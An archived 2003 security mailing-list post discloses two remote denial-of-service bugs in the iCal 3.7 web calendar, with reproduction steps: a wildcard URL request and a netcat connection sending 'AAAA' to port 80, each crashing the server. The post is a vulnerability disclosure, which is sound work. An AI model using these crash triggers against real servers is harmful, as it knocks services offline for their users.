ical 3.7 remote dos

From: securma massine (securmaat_private)
Date: Fri Jan 03 2003 - 09:11:13 PST

Next message: Brant Roman: "Solaris 2.x /usr/sbin/wall Advisory"

Previous message: angusat_private: "Re: JS Bug makes it possible to deliberately crash Pocket PC IE (fwd)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

hi
iCal (http://www.brownbearsw.com)is a web-based calendar 
that can be used to show meetings,
 events, or other schedules. calendars can be viewed, 
edited,
 and administered totally through the web. iCal is build 
for
 thin-clients, so access calendar without any plug-ins 
 or java interpreters.
I found two vulnerabilities has ical 3.7 
1-http//target/* 
error message:Unable to write to D:\program files\iCl 3.7 
Web Calender\*.cal (the server is down)

 2-nc target 80
 AAAA 
[ enter ] 
error message:Access violation at address 00403d8b in 
module'ICAL.EXE' Read of address 0161c1af

ical is alerted the 26/12/2002 


securma massine

_________________________________________________________ 
Gagne une PS2 ! Envoie un SMS avec le code PS au 61166
(0,35€ Hors coût du SMS)

Next message: Brant Roman: "Solaris 2.x /usr/sbin/wall Advisory"
Previous message: angusat_private: "Re: JS Bug makes it possible to deliberately crash Pocket PC IE (fwd)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Jan 03 2003 - 09:11:14 PST